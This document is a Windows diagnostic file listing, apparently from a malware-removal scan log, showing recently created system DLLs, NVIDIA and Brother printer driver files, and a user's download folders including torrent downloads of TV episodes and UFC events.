2016-03-09 11:53 - 2016-02-24 18:15 - 00365568 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2016-03-09 11:53 - 2016-02-24 18:14 - 00274944 _____ (Microsoft Corporation) C:\Windows\system32\ExSMime.dll
2016-03-09 11:53 - 2016-02-24 18:13 - 00121856 _____ (Microsoft Corporation) C:\Windows\system32\AppointmentActivation.dll
2016-03-09 11:53 - 2016-02-24 18:12 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\cemapi.dll
2016-03-09 11:53 - 2016-02-24 18:12 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\PhoneCallHistoryApis.dll
2016-03-09 11:53 - 2016-02-24 18:09 - 00258560 _____ (Microsoft Corporation) C:\Windows\system32\UserDataAccountApis.dll
2016-03-09 11:53 - 2016-02-24 18:09 - 00161792 _____ (Microsoft Corporation) C:\Windows\system32\AppxSip.dll
2016-03-09 11:53 - 2016-02-24 18:07 - 00252928 _____ (Microsoft Corporation) C:\Windows\system32\PimIndexMaintenance.dll
2016-03-09 11:53 - 2016-02-24 18:05 - 00208896 _____ (Microsoft Corporation) C:\Windows\system32\storewuauth.dll
2016-03-09 11:53 - 2016-02-24 18:03 - 00088576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\olepro32.dll
2016-03-09 11:53 - 2016-02-24 18:02 - 00161280 _____ (Microsoft Corporation) C:\Windows\system32\CallHistoryClient.dll
2016-03-09 11:53 - 2016-02-24 18:01 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\AuthBroker.dll
2016-03-09 11:53 - 2016-02-24 17:59 - 00450560 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Bluetooth.dll
2016-03-09 11:53 - 2016-02-24 17:59 - 00318976 _____ (Microsoft Corporation) C:\Windows\system32\domgmt.dll
2016-03-09 11:53 - 2016-02-24 17:55 - 00790528 _____ (Microsoft Corporation) C:\Windows\system32\EmailApis.dll
2016-03-09 11:53 - 2016-02-24 17:55 - 00224256 _____ (Microsoft Corporation) C:\Windows\system32\PackageStateRoaming.dll
2016-03-09 11:53 - 2016-02-24 17:55 - 00018944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExtrasXmlParser.dll
2016-03-09 11:53 - 2016-02-24 17:54 - 00526336 _____ (Microsoft Corporation) C:\Windows\system32\FirewallAPI.dll
2016-03-09 11:53 - 2016-02-24 17:54 - 00228352 _____ (Microsoft Corporation) C:\Windows\system32\wsqmcons.exe
2016-03-09 11:53 - 2016-02-24 17:49 - 00726528 _____ (Microsoft Corporation) C:\Windows\system32\ChatApis.dll
2016-03-09 11:53 - 2016-02-24 17:44 - 01713664 _____ (Microsoft Corporation) C:\Windows\system32\SRHInproc.dll
2016-03-09 11:53 - 2016-02-24 17:44 - 00700416 _____ (Microsoft Corporation) C:\Windows\system32\AppointmentApis.dll
2016-03-09 11:53 - 2016-02-24 17:44 - 00056320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\POSyncServices.dll
2016-03-09 11:53 - 2016-02-24 17:43 - 00957952 _____ (Microsoft Corporation) C:\Windows\system32\SRH.dll
2016-03-09 11:53 - 2016-02-24 17:43 - 00286720 _____ (Microsoft Corporation) C:\Windows\system32\deviceaccess.dll
2016-03-09 11:53 - 2016-02-24 17:41 - 00982016 _____ (Microsoft Corporation) C:\Windows\system32\AppxPackaging.dll
2016-03-09 11:53 - 2016-02-24 17:41 - 00436736 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentClient.dll
2016-03-09 11:53 - 2016-02-24 17:40 - 01224704 _____ (Microsoft Corporation) C:\Windows\system32\Unistore.dll
2016-03-09 11:53 - 2016-02-24 17:40 - 00078848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll
2016-03-09 11:53 - 2016-02-24 17:39 - 01390592 _____ (Microsoft Corporation) C:\Windows\system32\win32kbase.sys
2016-03-09 11:53 - 2016-02-24 17:38 - 00150528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VCardParser.dll
2016-03-09 11:53 - 2016-02-24 17:36 - 01847808 _____ (Microsoft Corporation) C:\Windows\system32\WMPDMC.exe
2016-03-09 11:53 - 2016-02-24 17:34 - 00938496 _____ (Microsoft Corporation) C:\Windows\system32\ContactApis.dll
2016-03-09 11:53 - 2016-02-24 17:34 - 00303104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2016-03-09 11:53 - 2016-02-24 17:32 - 00223744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExSMime.dll
2016-03-09 11:53 - 2016-02-24 17:32 - 00098304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppointmentActivation.dll
2016-03-09 11:53 - 2016-02-24 17:31 - 00200704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cemapi.dll
2016-03-09 11:53 - 2016-02-24 17:31 - 00169984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PhoneCallHistoryApis.dll
2016-03-09 11:53 - 2016-02-24 17:28 - 00870912 _____ (Microsoft Corporation) C:\Windows\system32\MPSSVC.dll
2016-03-09 11:53 - 2016-02-24 17:28 - 00196608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataAccountApis.dll
2016-03-09 11:53 - 2016-02-24 17:28 - 00135168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppxSip.dll
2016-03-09 11:53 - 2016-02-24 17:25 - 00401408 _____ (Microsoft Corporation) C:\Windows\system32\sharemediacpl.dll
2016-03-09 11:53 - 2016-02-24 17:21 - 00315904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Internal.Bluetooth.dll
2016-03-09 11:53 - 2016-02-24 17:21 - 00168448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Scanners.dll
2016-03-09 11:53 - 2016-02-24 17:18 - 00575488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\EmailApis.dll
2016-03-09 11:53 - 2016-02-24 17:18 - 00184832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PackageStateRoaming.dll
2016-03-09 11:53 - 2016-02-24 17:17 - 00369664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FirewallAPI.dll
2016-03-09 11:53 - 2016-02-24 17:13 - 00540160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ChatApis.dll
2016-03-09 11:53 - 2016-02-24 17:11 - 03593216 _____ (Microsoft Corporation) C:\Windows\system32\win32kfull.sys
2016-03-09 11:53 - 2016-02-24 17:09 - 01443328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SRHInproc.dll
2016-03-09 11:53 - 2016-02-24 17:09 - 00793600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SRH.dll
2016-03-09 11:53 - 2016-02-24 17:09 - 00552960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppointmentApis.dll
2016-03-09 11:53 - 2016-02-24 17:09 - 00228352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\deviceaccess.dll
2016-03-09 11:53 - 2016-02-24 17:07 - 00949248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Unistore.dll
2016-03-09 11:53 - 2016-02-24 17:07 - 00890368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppxPackaging.dll
2016-03-09 11:53 - 2016-02-24 17:07 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppXDeploymentClient.dll
2016-03-09 11:53 - 2016-02-24 17:04 - 01497088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMPDMC.exe
2016-03-09 11:53 - 2016-02-24 17:03 - 00769536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ContactApis.dll
2016-03-09 11:53 - 2016-02-24 17:01 - 01831936 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentExtensions.dll
2016-03-09 11:53 - 2016-02-24 17:00 - 02273792 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2016-03-09 11:53 - 2016-02-24 17:00 - 01098752 _____ (Microsoft Corporation) C:\Windows\system32\dosvc.dll
2016-03-09 11:53 - 2016-02-24 16:57 - 02158592 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentServer.dll
2016-03-09 11:53 - 2016-02-24 16:55 - 01996288 _____ (Microsoft Corporation) C:\Windows\system32\ActiveSyncProvider.dll
2016-03-09 11:53 - 2016-02-24 16:34 - 01707520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ActiveSyncProvider.dll
2016-03-09 11:53 - 2016-02-24 16:22 - 00163328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fwbase.dll
2016-03-09 11:53 - 2016-02-24 16:20 - 22376960 _____ (Microsoft Corporation) C:\Windows\system32\edgehtml.dll
2016-03-09 11:53 - 2016-02-24 16:18 - 18677760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edgehtml.dll
2016-03-09 11:53 - 2016-02-24 16:12 - 19339776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-03-09 11:53 - 2016-02-24 16:12 - 05321728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Data.Pdf.dll
2016-03-09 11:53 - 2016-02-24 16:10 - 24600576 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-03-09 11:53 - 2016-02-24 16:09 - 06972416 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Data.Pdf.dll
2016-03-09 11:53 - 2016-02-24 16:05 - 12586496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2016-03-09 11:53 - 2016-02-24 16:03 - 14252544 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2016-03-09 11:53 - 2016-02-24 15:59 - 05661696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakra.dll
2016-03-09 11:53 - 2016-02-24 15:55 - 07835648 _____ (Microsoft Corporation) C:\Windows\system32\Chakra.dll
2016-03-09 11:52 - 2016-02-24 18:39 - 00045568 _____ (Microsoft Corporation) C:\Windows\system32\UserDataTypeHelperUtil.dll
2016-03-09 11:52 - 2016-02-24 18:39 - 00023552 _____ (Microsoft Corporation) C:\Windows\system32\ExtrasXmlParser.dll
2016-03-09 11:52 - 2016-02-24 18:38 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\UserDataTimeUtil.dll
2016-03-09 11:52 - 2016-02-24 18:37 - 00045056 _____ (Microsoft Corporation) C:\Windows\system32\UserDataLanguageUtil.dll
2016-03-09 11:52 - 2016-02-24 18:35 - 00045568 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2016-03-09 11:52 - 2016-02-24 18:31 - 00118272 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2016-03-09 11:52 - 2016-02-24 18:30 - 00025600 _____ (Microsoft Corporation) C:\Windows\system32\wfapigp.dll
2016-03-09 11:52 - 2016-02-24 18:28 - 00070656 _____ (Microsoft Corporation) C:\Windows\system32\POSyncServices.dll
2016-03-09 11:52 - 2016-02-24 18:22 - 00196608 _____ (Microsoft Corporation) C:\Windows\system32\fwpolicyiomgr.dll
2016-03-09 11:52 - 2016-02-24 18:19 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\seclogon.dll
2016-03-09 11:52 - 2016-02-24 18:10 - 00093184 _____ (Microsoft Corporation) C:\Windows\system32\wpninprc.dll
2016-03-09 11:52 - 2016-02-24 18:01 - 00764928 _____ (Microsoft Corporation) C:\Windows\system32\Chakradiag.dll
2016-03-09 11:52 - 2016-02-24 18:01 - 00067584 _____ (Microsoft Corporation) C:\Windows\system32\profext.dll
2016-03-09 11:52 - 2016-02-24 18:00 - 00214528 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Scanners.dll
2016-03-09 11:52 - 2016-02-24 17:59 - 00360448 _____ (Microsoft Corporation) C:\Windows\system32\vaultsvc.dll
2016-03-09 11:52 - 2016-02-24 17:58 - 00685568 _____ (Microsoft Corporation) C:\Windows\system32\scapi.dll
2016-03-09 11:52 - 2016-02-24 17:54 - 00288768 _____ (Microsoft Corporation) C:\Windows\system32\vaultcli.dll
2016-03-09 11:52 - 2016-02-24 17:54 - 00037888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataTypeHelperUtil.dll
2016-03-09 11:52 - 2016-02-24 17:53 - 00089088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataTimeUtil.dll
2016-03-09 11:52 - 2016-02-24 17:53 - 00037888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataLanguageUtil.dll
2016-03-09 11:52 - 2016-02-24 17:52 - 00451584 _____ (Microsoft Corporation) C:\Windows\system32\werui.dll
2016-03-09 11:52 - 2016-02-24 17:52 - 00048128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PimIndexMaintenanceClient.dll
2016-03-09 11:52 - 2016-02-24 17:51 - 00037376 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2016-03-09 11:52 - 2016-02-24 17:47 - 00093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2016-03-09 11:52 - 2016-02-24 17:46 - 00020480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wfapigp.dll
2016-03-09 11:52 - 2016-02-24 17:44 - 00915456 _____ (Microsoft Corporation) C:\Windows\system32\configurationclient.dll
2016-03-09 11:52 - 2016-02-24 17:40 - 00056320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataPlatformHelperUtil.dll
2016-03-09 11:52 - 2016-02-24 17:39 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fwpolicyiomgr.dll
2016-03-09 11:52 - 2016-02-24 17:23 - 00129024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CallHistoryClient.dll
2016-03-09 11:52 - 2016-02-24 17:22 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\profext.dll
2016-03-09 11:52 - 2016-02-24 17:18 - 01490432 _____ (Microsoft Corporation) C:\Windows\system32\UserDataService.dll
2016-03-09 11:52 - 2016-02-24 17:16 - 00394752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\werui.dll
2016-03-09 11:52 - 2016-02-24 16:43 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\fwbase.dll
2016-03-09 11:26 - 2016-03-09 11:35 - 00000000 ____D C:\Users\kevin\Downloads\The.Walking.Dead.S06E12.INTERNAL.720p.HDTV.x264-KILLERS[ettv]
2016-03-09 11:25 - 2016-03-09 11:26 - 00000000 ____D C:\Users\kevin\Downloads\The.Walking.Dead.S06E11.720p.WEB-DL.DD5.1.H.264-Cyphanix[ettv]
2016-03-09 11:19 - 2016-03-09 15:03 - 00000000 ____D C:\Users\kevin\AppData\LocalLow\uTorrent
2016-03-08 19:35 - 2016-03-08 21:57 - 00000000 ____D C:\Users\kevin\Downloads\[ www.Torrenting.com ] - UFC.152.Jones.vs.Belfort.DVDRip.XviD-BOV
2016-03-08 19:20 - 2016-03-08 19:20 - 00000000 ____D C:\Users\kevin\Downloads\UFC.152.Jones.vs.Belfort.PPV.HDTV.x264-EViLCREW
2016-03-08 18:41 - 2016-03-08 22:17 - 00000000 ____D C:\Users\kevin\Downloads\Jon Jones fights
2016-03-08 16:34 - 2016-03-08 16:34 - 00001454 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2016-03-08 16:34 - 2016-03-08 16:34 - 00000000 ____D C:\Users\kevin\AppData\Local\NVIDIA Corporation
2016-03-08 16:32 - 2016-03-03 20:29 - 00110016 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe
2016-03-08 16:31 - 2016-03-03 23:16 - 42968120 _____ C:\Windows\system32\nvcompiler.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 37608384 _____ C:\Windows\SysWOW64\nvcompiler.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 22971960 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 21322480 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 20864112 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 18907704 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 17732768 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 17368232 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 17325592 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 10546944 _____ C:\Windows\system32\nvptxJitCompiler.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 08657936 _____ C:\Windows\SysWOW64\nvptxJitCompiler.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 02613696 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 02257344 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 01922496 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6436447.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 01571776 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6436447.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00956984 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00885184 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00751672 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00692160 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00678520 _____ C:\Windows\system32\nvfatbinaryLoader.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00571912 _____ C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00545816 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00448824 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00175552 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00153208 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00151368 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00128512 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00099472 _____ (NVIDIA Corporation) C:\Windows\system32\nvaudcap64v.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00090768 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvaudcap32v.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00000139 _____ C:\Windows\SysWOW64\nv-vk32.json
2016-03-08 16:31 - 2016-03-03 23:16 - 00000139 _____ C:\Windows\system32\nv-vk64.json
2016-03-08 16:29 - 2016-03-08 16:30 - 340902064 _____ (NVIDIA Corporation) C:\Users\kevin\Downloads\364.47-desktop-win10-64bit-international-whql.exe
2016-03-03 16:48 - 2016-03-03 16:48 - 00002190 _____ C:\Users\kevin\Desktop\Avira Scout.lnk
2016-03-03 16:48 - 2016-03-03 16:48 - 00000000 ____D C:\Users\kevin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Avira
2016-03-03 16:48 - 2016-03-03 16:48 - 00000000 ____D C:\Users\kevin\AppData\Local\Package Cache
2016-03-02 22:43 - 2016-03-02 22:43 - 00002217 _____ C:\Users\Public\Desktop\Brother Creative Center.lnk
2016-03-02 22:43 - 2016-03-02 22:43 - 00002132 _____ C:\Users\Public\Desktop\Brother Utilities.lnk
2016-03-02 22:43 - 2016-03-02 22:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Brother
2016-03-02 22:43 - 2016-03-02 22:43 - 00000000 ____D C:\Program Files (x86)\Browny02
2016-03-02 22:43 - 2016-03-02 22:43 - 00000000 ____D C:\Program Files (x86)\Brother
2016-03-02 22:43 - 2016-03-02 22:43 - 00000000 ____D C:\Brother
2016-03-02 22:43 - 2014-04-10 12:58 - 00180224 _____ (Brother Industries, Ltd.) C:\Windows\SysWOW64\BROSNMP.DLL
2016-03-02 22:43 - 2014-04-10 12:58 - 00077824 _____ (Brother Industries, Ltd.) C:\Windows\SysWOW64\BRLMW03A.DLL
2016-03-02 22:43 - 2014-04-10 12:58 - 00045056 _____ C:\Windows\SysWOW64\BRTCPCON.DLL
2016-03-02 22:43 - 2014-04-10 12:58 - 00025299 _____ (Brother Industries, Ltd) C:\Windows\SysWOW64\BRLM03A.DLL
2016-03-02 22:43 - 2014-04-10 12:58 - 00000114 _____ C:\Windows\SysWOW64\BRLMW03A.INI
2016-03-02 22:43 - 2014-04-10 12:57 - 00000050 _____ C:\Windows\system32\BRADM14A.DAT
2016-03-02 22:43 - 2014-04-10 03:00 - 00227840 _____ (Brother Industries, Ltd.) C:\Windows\system32\BRCOM14A.DLL
2016-03-02 22:43 - 2013-07-12 14:03 - 00214016 ____N (brother) C:\Windows\SysWOW64\NSSearch.dll
2016-03-02 22:43 - 2012-12-03 13:39 - 00002560 ____N (Brother Industries Ltd.) C:\Windows\SysWOW64\BrDctF2S.dll
2016-03-02 22:43 - 2010-03-15 19:45 - 00073728 ____N (Brother Industries Ltd.) C:\Windows\SysWOW64\BrDctF2.dll
2016-03-02 22:43 - 2007-12-13 22:16 - 00005120 ____N (Brother Industries Ltd.) C:\Windows\SysWOW64\BrDctF2L.dll
2016-03-02 22:42 - 2016-03-02 22:43 - 00000000 ____D C:\ProgramData\Brother
2016-03-02 22:42 - 2016-03-02 22:42 - 00000000 ____D C:\Users\kevin\Downloads\install
2016-03-02 22:41 - 2016-03-02 22:42 - 51623360 _____ (A.I.SOFT,INC.) C:\Users\kevin\Downloads\HL-1210W-inst-A1-eu.EXE
2016-03-02 22:38 - 2016-03-02 22:38 - 19712527 _____ C:\Users\kevin\Downloads\MonoLaserPRT12_2_UW_101.dmg
2016-03-02 22:38 - 2016-03-02 22:38 - 05275648 _____ C:\Users\kevin\Downloads\BrMain374_a.dmg
2016-03-02 13:26 - 2016-02-23 22:25 - 01818696 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-03-02 13:26 - 2016-02-23 21:34 - 01542816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-03-02 13:26 - 2016-02-23 21:32 - 08705672 _____ (Microsoft Corp.) C:\Windows\system32\Windows.Media.Protection.PlayReady.dll
2016-03-02 13:26 - 2016-02-23 21:32 - 00369912 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2016-03-02 13:26 - 2016-02-23 21:31 - 00536256 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2016-03-02 13:26 - 2016-02-23 20:38 - 06952088 _____ (Microsoft Corp.) C:\Windows\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-03-02 13:26 - 2016-02-23 20:27 - 21124344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2016-03-02 13:26 - 2016-02-23 19:58 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\wininetlui.dll
2016-03-02 13:26 - 2016-02-23 19:28 - 00275456 _____ (Microsoft Corporation) C:\Windows\system32\AudioEndpointBuilder.dll
2016-03-02 13:26 - 2016-02-23 19:09 - 01054208 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2016-03-02 13:26 - 2016-02-23 19:06 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininetlui.dll
2016-03-02 13:26 - 2016-02-23 19:06 - 00045568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-03-02 13:26 - 2016-02-23 19:00 - 02624512 _____ (Microsoft Corporation) C:\Windows\system32\InputService.dll
2016-03-02 13:26 - 2016-02-23 18:58 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\TextInputFramework.dll
2016-03-02 13:26 - 2016-02-23 18:30 - 01731584 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-03-02 13:26 - 2016-02-23 18:24 - 02755584 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-03-02 13:26 - 2016-02-23 18:22 - 01944576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InputService.dll
2016-03-02 13:26 - 2016-02-23 18:21 - 00245760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TextInputFramework.dll
2016-03-02 13:26 - 2016-02-23 17:59 - 01500672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-03-02 13:26 - 2016-02-23 17:55 - 04894208 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-03-02 13:26 - 2016-02-23 17:55 - 02229760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-03-02 13:26 - 2016-02-23 17:52 - 11545600 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll
2016-03-02 13:26 - 2016-02-23 17:50 - 09919488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll
2016-03-02 13:26 - 2016-02-23 17:39 - 13382656 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-03-02 13:26 - 2016-02-23 17:36 - 12125696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-03-02 13:26 - 2016-02-23 17:36 - 03666432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-03-02 13:26 - 2016-02-09 14:24 - 00641536 _____ (Microsoft Corporation) C:\Windows\system32\enterprisecsps.dll
2016-03-02 13:26 - 2016-02-09 14:07 - 01626624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmcore.dll
2016-03-02 13:26 - 2016-02-09 14:04 - 01946624 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2016-03-02 13:25 - 2016-02-23 22:29 - 01030416 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2016-03-02 13:25 - 2016-02-23 22:29 - 00874968 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2016-03-02 13:25 - 2016-02-23 22:27 - 02654872 _____ C:\Windows\system32\CoreUIComponents.dll
2016-03-02 13:25 - 2016-02-23 22:27 - 01317640 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2016-03-02 13:25 - 2016-02-23 22:27 - 01141504 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2016-03-02 13:25 - 2016-02-23 22:25 - 02152288 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2016-03-02 13:25 - 2016-02-23 22:25 - 00563552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\acpi.sys
2016-03-02 13:25 - 2016-02-23 22:15 - 00779384 _____ (Microsoft Corporation) C:\Windows\system32\taskschd.dll
2016-03-02 13:25 - 2016-02-23 22:08 - 00989536 _____ (Microsoft Corporation) C:\Windows\system32\SecConfig.efi
2016-03-02 13:25 - 2016-02-23 21:34 - 01859960 _____ C:\Windows\SysWOW64\CoreUIComponents.dll
2016-03-02 13:25 - 2016-02-23 21:33 - 00696160 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupEngine.dll
2016-03-02 13:25 - 2016-02-23 21:33 - 00389992 _____ (Microsoft Corporation) C:\Windows\system32\wlanapi.dll
2016-03-02 13:25 - 2016-02-23 21:32 - 02544264 _____ (Microsoft Corporation) C:\Windows\system32\mfcore.dll
2016-03-02 13:25 - 2016-02-23 21:32 - 01152328 _____ (Microsoft Corporation) C:\Windows\system32\mfasfsrcsnk.dll
2016-03-02 13:25 - 2016-02-23 21:32 - 01062480 _____ (Microsoft Corporation) C:\Windows\system32\mfmp4srcsnk.dll
2016-03-02 13:25 - 2016-02-23 21:32 - 00498448 _____ (Microsoft Corporation) C:\Windows\system32\MFCaptureEngine.dll
2016-03-02 13:25 - 2016-02-23 21:31 - 01017032 _____ (Microsoft Corporation) C:\Windows\system32\mfsrcsnk.dll
2016-03-02 13:25 - 2016-02-23 21:31 - 00819648 _____ (Microsoft Corporation) C:\Windows\system32\mfmpeg2srcsnk.dll
2016-03-02 13:25 - 2016-02-23 21:31 - 00476728 _____ (Microsoft Corporation) C:\Windows\system32\msvproc.dll
2016-03-02 13:25 - 2016-02-23 21:31 - 00408120 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2016-03-02 13:25 - 2016-02-23 21:25 - 03671888 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-03-02 13:25 - 2016-02-23 21:22 - 00572272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\taskschd.dll
2016-03-02 13:25 - 2016-02-23 21:21 - 22564328 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2016-03-02 13:25 - 2016-02-23 21:17 - 00146272 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2016-03-02 13:25 - 2016-02-23 20:45 - 02773096 _____ (Microsoft Corporation) C:\Windows\system32\d3d11.dll
